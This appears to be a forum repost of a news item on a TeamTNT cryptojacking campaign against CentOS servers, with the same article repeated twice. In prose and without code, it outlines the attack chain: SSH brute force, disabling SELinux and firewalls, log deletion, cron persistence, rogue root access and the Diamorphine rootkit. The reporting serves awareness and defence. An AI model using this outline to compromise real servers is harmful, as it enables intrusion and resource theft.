Friend
Professional
- Messages
- 2,653
- Reaction score
- 850
- Points
- 113
Why do system logs disappear without a trace from hacked servers?
The TeamTNT cybercriminal group has stepped up again and launched a new cryptojacking campaign, targeting servers running the CentOS operating system. According to Group-IB, attackers use brute force attacks via SSH to penetrate virtual servers.
After gaining access, hackers download a malicious script that disables defense mechanisms, deletes logs, stops competing mining processes, and prevents system recovery. As a result of this chain of actions, hackers install the Diamorphine rootkit, which hides malicious processes and provides remote access to compromised hosts.
With moderate certainty, researchers attribute the identified attacks to the TeamTNT group due to the similarity of tactics and methods used in its past operations. TeamTNT was first spotted in 2019 conducting illegal cryptocurrency mining on cloud and container platforms. In 2021, the group announced the end of its activities, but since 2022, more and more attacks attributed to this group have been recorded.
In the new campaign, the malicious script first checks the infected system for traces of other cryptojacking operations. It then disables security systems such as SELinux, AppArmor, and the firewall. The attackers paid special attention to the "aliyun.service" service associated with the Alibaba cloud provider. If this service is detected, the script loads commands to remove it, freeing up resources for its own operations.
As noted above, the script eliminates competitors by killing the processes of other miners and removing their containers, as well as their associated images. To maintain control over the server, attackers set up cron tasks that download updates from a remote server every 30 minutes. In addition, they modify the SSH authorization file by adding a root account for permanent access.
To hide the traces of their activity, criminals change file attributes, create accounts with administrator access, and erase command history.
TeamTNT's ongoing attacks clearly show that a lull in cyberspace is an illusion. Hackers do not disappear, but improve. Every server is a potential target, and protecting it requires constant effort.
Source
The TeamTNT cybercriminal group has stepped up again and launched a new cryptojacking campaign, targeting servers running the CentOS operating system. According to Group-IB, attackers use brute force attacks via SSH to penetrate virtual servers.
After gaining access, hackers download a malicious script that disables defense mechanisms, deletes logs, stops competing mining processes, and prevents system recovery. As a result of this chain of actions, hackers install the Diamorphine rootkit, which hides malicious processes and provides remote access to compromised hosts.
With moderate certainty, researchers attribute the identified attacks to the TeamTNT group due to the similarity of tactics and methods used in its past operations. TeamTNT was first spotted in 2019 conducting illegal cryptocurrency mining on cloud and container platforms. In 2021, the group announced the end of its activities, but since 2022, more and more attacks attributed to this group have been recorded.
In the new campaign, the malicious script first checks the infected system for traces of other cryptojacking operations. It then disables security systems such as SELinux, AppArmor, and the firewall. The attackers paid special attention to the "aliyun.service" service associated with the Alibaba cloud provider. If this service is detected, the script loads commands to remove it, freeing up resources for its own operations.
As noted above, the script eliminates competitors by killing the processes of other miners and removing their containers, as well as their associated images. To maintain control over the server, attackers set up cron tasks that download updates from a remote server every 30 minutes. In addition, they modify the SSH authorization file by adding a root account for permanent access.
To hide the traces of their activity, criminals change file attributes, create accounts with administrator access, and erase command history.
TeamTNT's ongoing attacks clearly show that a lull in cyberspace is an illusion. Hackers do not disappear, but improve. Every server is a potential target, and protecting it requires constant effort.
Source
